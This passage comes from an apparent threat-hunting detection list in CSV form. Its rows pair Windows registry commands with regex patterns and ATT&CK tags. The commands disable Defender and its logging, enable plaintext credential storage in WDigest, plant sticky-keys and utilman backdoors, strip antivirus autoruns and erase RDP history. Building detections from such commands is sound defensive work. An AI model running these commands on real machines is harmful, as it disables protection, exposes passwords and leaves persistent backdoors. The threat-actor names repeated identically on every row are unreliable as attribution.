Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*reg add ""HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger"" /v ""Start"" /t REG_DWORD /d ""0"" 
/f*",".{0,1000}reg\sadd\s\""HKLM\\System\\CurrentControlSet\\Control\\WMI\\Autologger\\DefenderAuditLogger\""\s\/v\s\""Start\""\s\/t\sREG_DWORD\s\/d\s\""0\""\s\/f.{0,1000}","greyware_tool_keyword","reg","disable logging related to Windows Defender","T1070.003 - T1112","TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*reg add ""HKLM\System\CurrentControlSet\Services\SecurityHealthService"" /v ""Start"" /t REG_DWORD /d ""4"" /f*",".{0,1000}reg\sadd\s\""HKLM\\System\\CurrentControlSet\\Services\\SecurityHealthService\""\s\/v\s\""Start\""\s\/t\sREG_DWORD\s\/d\s\""4\""\s\/f.{0,1000}","greyware_tool_keyword","reg","disable Windows Defender-related services","T1562.001 - T1112","TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*reg add ""HKLM\System\CurrentControlSet\Services\WdBoot"" /v ""Start"" /t REG_DWORD /d ""4"" /f*",".{0,1000}reg\sadd\s\""HKLM\\System\\CurrentControlSet\\Services\\WdBoot\""\s\/v\s\""Start\""\s\/t\sREG_DWORD\s\/d\s\""4\""\s\/f.{0,1000}","greyware_tool_keyword","reg","disable Windows Defender-related services","T1562.001 - T1112","TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*reg add ""HKLM\System\CurrentControlSet\Services\WdFilter"" /v ""Start"" /t REG_DWORD /d ""4"" /f*",".{0,1000}reg\sadd\s\""HKLM\\System\\CurrentControlSet\\Services\\WdFilter\""\s\/v\s\""Start\""\s\/t\sREG_DWORD\s\/d\s\""4\""\s\/f.{0,1000}","greyware_tool_keyword","reg","disable Windows Defender-related 
services","T1562.001 - T1112","TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*reg add ""HKLM\System\CurrentControlSet\Services\WdNisDrv"" /v ""Start"" /t REG_DWORD /d ""4"" /f*",".{0,1000}reg\sadd\s\""HKLM\\System\\CurrentControlSet\\Services\\WdNisDrv\""\s\/v\s\""Start\""\s\/t\sREG_DWORD\s\/d\s\""4\""\s\/f.{0,1000}","greyware_tool_keyword","reg","disable Windows Defender-related services","T1562.001 - T1112","TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*reg add ""HKLM\System\CurrentControlSet\Services\WdNisSvc"" /v ""Start"" /t REG_DWORD /d ""4"" /f*",".{0,1000}reg\sadd\s\""HKLM\\System\\CurrentControlSet\\Services\\WdNisSvc\""\s\/v\s\""Start\""\s\/t\sREG_DWORD\s\/d\s\""4\""\s\/f.{0,1000}","greyware_tool_keyword","reg","disable Windows Defender-related services","T1562.001 - T1112","TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*reg add ""HKLM\System\CurrentControlSet\Services\WinDefend"" /v ""Start"" /t REG_DWORD /d ""4"" /f*",".{0,1000}reg\sadd\s\""HKLM\\System\\CurrentControlSet\\Services\\WinDefend\""\s\/v\s\""Start\""\s\/t\sREG_DWORD\s\/d\s\""4\""\s\/f.{0,1000}","greyware_tool_keyword","reg","disable Windows Defender-related services","T1562.001 - T1112","TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense 
Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*REG ADD ""HKLM\SYSTEM\CurrentControlSet\services\WinDefend"" /v Start /t REG_DWORD /d 4 /f*",".{0,1000}REG\sADD\s\""HKLM\\SYSTEM\\CurrentControlSet\\services\\WinDefend\""\s\/v\sStart\s\/t\sREG_DWORD\s\/d\s4\s\/f.{0,1000}","greyware_tool_keyword","reg","disables Windows Defender by setting its start value to 4 (disabled)","T1562.001 - T1112","TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://github.com/spicy-bear/Threat-Hunting/blob/2c89b519862672e29547b4db4796caa923044595/95.213.145.101/%D1%81%D0%B8%D1%80/bat/defendermalwar.bat#L7","1","0","N/A","N/A","10","1","3","1","2024-04-03T14:52:39Z","2022-10-31T16:09:50Z" "*reg add *HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server* /v fDenyTSConnections /t REG_DWORD /d 0 /f*",".{0,1000}reg\sadd\s.{0,1000}HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal\sServer.{0,1000}\s\/v\sfDenyTSConnections\s\/t\sREG_DWORD\s\/d\s0\s\/f.{0,1000}","greyware_tool_keyword","reg","Allowing remote connections to this computer","T1021.001 - T1059.003 - T1112","TA0008 - TA0002","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","N/A","1","0","N/A","N/A","7","7","N/A","N/A","N/A","N/A" "*REG ADD *HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe* /t REG_SZ /v Debugger /d *\windows\system32\cmd.exe* /f*",".{0,1000}REG\sADD\s.{0,1000}HKLM\\SOFTWARE\\Microsoft\\Windows\sNT\\CurrentVersion\\Image\sFile\sExecution\sOptions\\sethc\.exe.{0,1000}\s\/t\sREG_SZ\s\/v\sDebugger\s\/d\s.{0,1000}\\windows\\system32\\cmd\.exe.{0,1000}\s\/f.{0,1000}","greyware_tool_keyword","reg","Hit F5 a bunch of times when you are at the RDP login screen","T1546.012 - T1059.003 - T1055.001 - T1112","TA0002 - TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - 
Turla","Persistence","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*REG ADD *HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe* /t REG_SZ /v Debugger /d *\windows\system32\cmd.exe* /f*",".{0,1000}REG\sADD\s.{0,1000}HKLM\\SOFTWARE\\Microsoft\\Windows\sNT\\CurrentVersion\\Image\sFile\sExecution\sOptions\\utilman\.exe.{0,1000}\s\/t\sREG_SZ\s\/v\sDebugger\s\/d\s.{0,1000}\\windows\\system32\\cmd\.exe.{0,1000}\s\/f.{0,1000}","greyware_tool_keyword","reg","At the login screen press Windows Key+U and you get a cmd.exe window as SYSTEM.","T1546.012 - T1059.003 - T1055.001 - T1112","TA0002 - TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Persistence","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*reg add *HKLM\SOFTWARE\Policies\Microsoft\Windows Defender""* /v DisableAntiSpyware /t REG_DWORD /d 1 /f*",".{0,1000}reg\sadd\s.{0,1000}HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\sDefender\"".{0,1000}\s\/v\sDisableAntiSpyware\s\/t\sREG_DWORD\s\/d\s1\s\/f.{0,1000}","greyware_tool_keyword","reg","Defense evasion technique disable windows defender","T1562.001 - T1562.002 - T1070.004 - T1112","TA0007 - TA0040 - TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","N/A","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A" "*reg add *HKLM\Software\Policies\Microsoft\Windows Defender""*/v *DisableAntiSpyware* /t REG_DWORD /d *1* /f*",".{0,1000}reg\sadd\s.{0,1000}HKLM\\Software\\Policies\\Microsoft\\Windows\sDefender\"".{0,1000}\/v\s.{0,1000}DisableAntiSpyware.{0,1000}\s\/t\sREG_DWORD\s\/d\s.{0,1000}1.{0,1000}\s\/f.{0,1000}","greyware_tool_keyword","reg","Disable Real Time Protection","T1562.001 - T1562.002 - T1070.004 - T1112","TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","N/A","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A" "*reg add 
*HKLM\Software\Policies\Microsoft\Windows Defender* /v *DisableAntiVirus* /t REG_DWORD /d *1* /f*",".{0,1000}reg\sadd\s.{0,1000}HKLM\\Software\\Policies\\Microsoft\\Windows\sDefender.{0,1000}\s\/v\s.{0,1000}DisableAntiVirus.{0,1000}\s\/t\sREG_DWORD\s\/d\s.{0,1000}1.{0,1000}\s\/f.{0,1000}","greyware_tool_keyword","reg","Disable Real Time Protection","T1562.001 - T1562.002 - T1070.004 - T1112","TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","N/A","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A" "*reg add *HKLM\Software\Policies\Microsoft\Windows Defender* /v Disable* /t REG_DWORD /d 1 /f*",".{0,1000}reg\sadd\s.{0,1000}HKLM\\Software\\Policies\\Microsoft\\Windows\sDefender.{0,1000}\s\/v\sDisable.{0,1000}\s\/t\sREG_DWORD\s\/d\s1\s\/f.{0,1000}","greyware_tool_keyword","reg","Defense evasion technique - to avoid detection at any point of the kill chain attackers use several ways to disable anti-virus and Microsoft firewall and to clear logs","T1562.001 - T1562.002 - T1070.004 - T1112","TA0007 - TA0040 - TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","N/A","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A" "*reg add *HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction*",".{0,1000}reg\sadd\s.{0,1000}HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\sDefender\\Threats\\ThreatIDDefaultAction.{0,1000}","greyware_tool_keyword","reg","Windows Defender Tampering Via registry","T1489 - T1112","TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://www.virustotal.com/gui/file/00820a1f0972678cfe7885bc989ab3e5602b0febc96baf9bf3741d56aa374f03/behavior","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*reg add *HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\PrefetchParameters* /v EnablePrefetcher /t REG_DWORD /f /d 
0*",".{0,1000}reg\sadd\s.{0,1000}HKLM\\SYSTEM\\CurrentControlSet\\Control\\Session\sManager\\Memory\sManagement\\PrefetchParameters.{0,1000}\s\/v\sEnablePrefetcher\s\/t\sREG_DWORD\s\/f\s\/d\s0.{0,1000}","greyware_tool_keyword","reg","Anti forensic - Disabling Prefetch","T1215 - T1562.001 - T1037 - T1112","TA0008","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Anti-Forensics.md","1","0","N/A","N/A","N/A","10","1237","155","2024-08-26T19:30:51Z","2021-08-16T17:34:25Z" "*reg add *HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger* /v *Start* /t REG_DWORD /d *0* /f*",".{0,1000}reg\sadd\s.{0,1000}HKLM\\System\\CurrentControlSet\\Control\\WMI\\Autologger\\DefenderApiLogger.{0,1000}\s\/v\s.{0,1000}Start.{0,1000}\s\/t\sREG_DWORD\s\/d\s.{0,1000}0.{0,1000}\s\/f.{0,1000}","greyware_tool_keyword","reg","Blind ETW Windows Defender: zero out registry values corresponding to its ETW sessions","T1562.001 - T1055.001 - T1112","TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","N/A","1","0","N/A","greyware tool - risks of False positive !","10","7","N/A","N/A","N/A","N/A" "*reg add *HKLM\System\CurrentControlSet\Services\SecurityHealthService* /v *Start* /t REG_DWORD /d *4* /f*",".{0,1000}reg\sadd\s.{0,1000}HKLM\\System\\CurrentControlSet\\Services\\SecurityHealthService.{0,1000}\s\/v\s.{0,1000}Start.{0,1000}\s\/t\sREG_DWORD\s\/d\s.{0,1000}4.{0,1000}\s\/f.{0,1000}","greyware_tool_keyword","reg","Disable Windows Defender Security Center","T1562.001 - T1055.001 - T1112","TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","N/A","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A" "*reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin /t REG_DWORD /d ""0"" 
/f*",".{0,1000}reg\sadd\sHKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Lsa\s\/v\sDisableRestrictedAdmin\s\/t\sREG_DWORD\s\/d\s\""0\""\s\/f.{0,1000}","greyware_tool_keyword","reg","This modification can be used to enable or disable the Restricted Admin mode for Remote Desktop Protocol (RDP) which has implications for Lateral Movement and privilege escalation","T1112 - T1021 - T1078 - T1112","TA0005 - TA0006 - TA0008","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Lateral Movement","https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A" "*reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin /t REG_DWORD /d 0 /f*",".{0,1000}reg\sadd\sHKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Lsa\s\/v\sDisableRestrictedAdmin\s\/t\sREG_DWORD\s\/d\s0\s\/f.{0,1000}","greyware_tool_keyword","reg","This modification can be used to enable or disable the Restricted Admin mode for Remote Desktop Protocol (RDP) which has implications for Lateral Movement and privilege escalation","T1112 - T1021 - T1078 - T1112","TA0005 - TA0006 - TA0008","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Lateral Movement","https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A" "*reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa /v NoLMHash /t REG_DWORD /d ""0"" /f*",".{0,1000}reg\sadd\sHKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Lsa\s\/v\sNoLMHash\s\/t\sREG_DWORD\s\/d\s\""0\""\s\/f.{0,1000}","greyware_tool_keyword","reg","This particular change is associated with the handling of LAN Manager (LM) hash storage which can affect the security of password storage on the system. 
This command can be used as part of credential access or defense evasion techniques","T1112 - T1556 - T1547 - T1112","TA0005 - TA0006","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A" "*reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\CryptSvc\Parameters /t REG_EXPAND_SZ /v ServiceDll /d *",".{0,1000}reg\sadd\sHKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\CryptSvc\\Parameters\s\/t\sREG_EXPAND_SZ\s\/v\sServiceDll\s\/d\s.{0,1000}","greyware_tool_keyword","reg","Disable Cortex: Change the DLL to a random value","T1547.001 - T1055.001 - T1055.002 - T1112","TA0002 - TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","N/A","1","0","N/A","N/A","8","9","N/A","N/A","N/A","N/A" "*reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d /f 1*",".{0,1000}reg\sadd\sHKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest\s\/v\sUseLogonCredential\s\/t\sREG_DWORD\s\/d\s\/f\s1.{0,1000}","greyware_tool_keyword","reg","allows the storage of plaintext passwords in memory","T1003.001 - T1112","TA0006 - TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Credential Access","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f*",".{0,1000}reg\sadd\sHKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest\s\/v\sUseLogonCredential\s\/t\sREG_DWORD\s\/d\s1\s\/f.{0,1000}","greyware_tool_keyword","reg","allows the storage of plaintext passwords in memory","T1003.001 - T1112","TA0006 - TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Credential Access","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*reg add 
HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /f /d 1*",".{0,1000}reg\sadd\sHKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest\s\/v\sUseLogonCredential\s\/t\sREG_DWORD\s\/f\s\/d\s1.{0,1000}","greyware_tool_keyword","reg","allows the storage of plaintext passwords in memory","T1003.001 - T1112 - T1112","TA0006 - TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Credential Access","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*reg delete ""HKCR\*\shellex\ContextMenuHandlers\EPP"" /f*",".{0,1000}reg\sdelete\s\""HKCR\\.{0,1000}\\shellex\\ContextMenuHandlers\\EPP\""\s\/f.{0,1000}","greyware_tool_keyword","reg","remove the Windows Defender context menu options","T1112","TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*reg delete ""HKCR\Directory\shellex\ContextMenuHandlers\EPP"" /f*",".{0,1000}reg\sdelete\s\""HKCR\\Directory\\shellex\\ContextMenuHandlers\\EPP\""\s\/f.{0,1000}","greyware_tool_keyword","reg","remove the Windows Defender context menu options","T1112","TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*reg delete ""HKCR\Drive\shellex\ContextMenuHandlers\EPP"" /f*",".{0,1000}reg\sdelete\s\""HKCR\\Drive\\shellex\\ContextMenuHandlers\\EPP\""\s\/f.{0,1000}","greyware_tool_keyword","reg","remove the Windows Defender context menu options","T1112","TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Reg 
Delete ""HKCU\software\Microsoft\Windows\CurrentVersion\Run"" /v ""SUPERAntiSpyware"" /f /reg:32*",".{0,1000}Reg\sDelete\s\""HKCU\\software\\Microsoft\\Windows\\CurrentVersion\\Run\""\s\/v\s\""SUPERAntiSpyware\""\s\/f\s\/reg\:32.{0,1000}","greyware_tool_keyword","reg","prevents security tools from launching automatically","T1562.001 - T1543 - T1112","TA0003 - TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*reg delete ""HKCU\Software\Microsoft\Windows\CurrentVersion\Run"" /v ""Windows Defender"" /f*",".{0,1000}reg\sdelete\s\""HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\""\s\/v\s\""Windows\sDefender\""\s\/f.{0,1000}","greyware_tool_keyword","reg","remove Windows Defender from the system tray","T1112","TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*reg delete ""HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default"" /va /f*",".{0,1000}reg\sdelete\s\""HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal\sServer\sClient\\Default\""\s\/va\s\/f.{0,1000}","greyware_tool_keyword","reg","delete terminal server client entries from the registry - erasing potential evidence of RDP connections","T1070.004 - T1112","TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://github.com/roadwy/DefenderYara/blob/9bbdb7f9fd3513ce30aa69cd1d88830e3cf596ca/Ransom/Win32/Ergop/Ransom_Win32_Ergop_A_.yar#L10","1","0","N/A","N/A","10","10","196","46","2024-07-09T12:37:18Z","2024-02-05T13:57:05Z" "*reg delete ""HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"" 
/f*",".{0,1000}reg\sdelete\s\""HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal\sServer\sClient\\Servers\""\s\/f.{0,1000}","greyware_tool_keyword","reg","delete terminal server client entries from the registry - erasing potential evidence of RDP connections","T1070.004 - T1112","TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://github.com/roadwy/DefenderYara/blob/9bbdb7f9fd3513ce30aa69cd1d88830e3cf596ca/Ransom/Win32/Ergop/Ransom_Win32_Ergop_A_.yar#L10","1","0","N/A","N/A","10","10","196","46","2024-07-09T12:37:18Z","2024-02-05T13:57:05Z" "*reg delete ""HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run"" /v ""Windows Defender"" /f*",".{0,1000}reg\sdelete\s\""HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\StartupApproved\\Run\""\s\/v\s\""Windows\sDefender\""\s\/f.{0,1000}","greyware_tool_keyword","reg","remove Windows Defender from the system tray","T1112","TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Reg Delete ""HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"" /v ""AvastUI.exe"" /f /reg:32*",".{0,1000}Reg\sDelete\s\""HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\""\s\/v\s\""AvastUI\.exe\""\s\/f\s\/reg\:32.{0,1000}","greyware_tool_keyword","reg","prevents security tools from launching automatically","T1562.001 - T1543 - T1112","TA0003 - TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Reg Delete ""HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"" /v ""AvastUI.exe"" /f 
/reg:64*",".{0,1000}Reg\sDelete\s\""HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\""\s\/v\s\""AvastUI\.exe\""\s\/f\s\/reg\:64.{0,1000}","greyware_tool_keyword","reg","prevents security tools from launching automatically","T1562.001 - T1543 - T1112","TA0003 - TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Reg Delete ""HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"" /v ""AVGUI.exe"" /f /reg:32*",".{0,1000}Reg\sDelete\s\""HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\""\s\/v\s\""AVGUI\.exe\""\s\/f\s\/reg\:32.{0,1000}","greyware_tool_keyword","reg","prevents security tools from launching automatically","T1562.001 - T1543 - T1112","TA0003 - TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Reg Delete ""HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"" /v ""AVGUI.exe"" /f /reg:64*",".{0,1000}Reg\sDelete\s\""HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\""\s\/v\s\""AVGUI\.exe\""\s\/f\s\/reg\:64.{0,1000}","greyware_tool_keyword","reg","prevents security tools from launching automatically","T1562.001 - T1543 - T1112","TA0003 - TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Reg Delete ""HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"" /v ""Avira SystrayStartTrigger"" /f /reg:32*",".{0,1000}Reg\sDelete\s\""HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\""\s\/v\s\""Avira\sSystrayStartTrigger\""\s\/f\s\/reg\:32.{0,1000}","greyware_tool_keyword","reg","prevents 
security tools from launching automatically","T1562.001 - T1543 - T1112","TA0003 - TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Reg Delete ""HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"" /v ""Avira SystrayStartTrigger"" /f /reg:64*",".{0,1000}Reg\sDelete\s\""HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\""\s\/v\s\""Avira\sSystrayStartTrigger\""\s\/f\s\/reg\:64.{0,1000}","greyware_tool_keyword","reg","prevents security tools from launching automatically","T1562.001 - T1543 - T1112","TA0003 - TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Reg Delete ""HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"" /v ""ClamWin"" /f /reg:32*",".{0,1000}Reg\sDelete\s\""HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\""\s\/v\s\""ClamWin\""\s\/f\s\/reg\:32.{0,1000}","greyware_tool_keyword","reg","prevents security tools from launching automatically","T1562.001 - T1543 - T1112","TA0003 - TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Reg Delete ""HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"" /v ""ClamWin"" /f /reg:64*",".{0,1000}Reg\sDelete\s\""HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\""\s\/v\s\""ClamWin\""\s\/f\s\/reg\:64.{0,1000}","greyware_tool_keyword","reg","prevents security tools from launching automatically","T1562.001 - T1543 - T1112","TA0003 - TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense 
Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Reg Delete ""HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"" /v ""COMODO Internet Security"" /f /reg:32*",".{0,1000}Reg\sDelete\s\""HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\""\s\/v\s\""COMODO\sInternet\sSecurity\""\s\/f\s\/reg\:32.{0,1000}","greyware_tool_keyword","reg","prevents security tools from launching automatically","T1562.001 - T1543 - T1112","TA0003 - TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Reg Delete 